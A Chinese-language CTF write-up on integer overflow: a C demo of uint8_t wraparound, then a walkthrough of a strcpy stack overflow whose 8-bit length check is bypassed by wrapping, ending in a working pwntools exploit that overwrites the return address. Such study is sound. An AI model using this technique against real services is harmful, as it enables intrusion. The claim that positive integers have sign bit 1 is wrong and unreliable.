整数溢出学习记录

整数溢出原理：

整数分为有符号和无符号两种类型， 有符号数以最高位作为其符号位，即正整数
最高位为 1，负数为 0，无符号数取值范围为非负数，常见各类型占用字节数如
下：

C语言测试一下整数溢出

#include <stdio.h>

#include <stdint.h>

int main()

{

       uint8_t t1 = 1, t2 = 257;

       if (t1 == t2)

       {

              printf("Overflow");

       }

       return 0;

}

运行：

溢出成功，可以得到结论：当一个数据超出它的最大数据类型的范围时，超出的部分不会被计算，只有规定的范围内的数据会被使用。所以257（0001 0000 0001）中只计算了后8位，即被视为1（0000 0001）

攻防世界CTF题目

无栈溢出保护

主函数：

逻辑很简单：

只有登录和退出，看一下登录

输入用户名密码，注意到check函数使用了密码。

很显然漏洞出在strcpy函数

同时搜索字符串注意到

我们只需要产生溢出，覆盖返回地址就可以了。

分析check函数发现，只有密码的长度在3<x<=8时，才可以“success”，并可以利用strcpy进行溢出。但溢出点dest的大小就达到了0x14（十进制20），已经不够长度的输入了。。。

所以要怎样满足这个所谓的  “3<密码长度<=8”  这个条件呢？

这里注意到v3的类型：

int8代表8bit，即0~255，正是上面C语言测试的类型。

可以考虑使用一下整数溢出：

from pwn import *
context.log_level = 'debug'
cn = remote('111.198.29.45',48928)
cn.recvuntil("Your choice:")
cn.sendline('1')
cn.recvuntil("username:")
cn.sendline('zzZ')

payload = 'a'*0x14 + 'a'*4 + p32(0x804868B) + 'a' * 233

cn.recvuntil("passwd:")
cn.sendline(payload)
cn.interactive()

溢出成功，得到flag。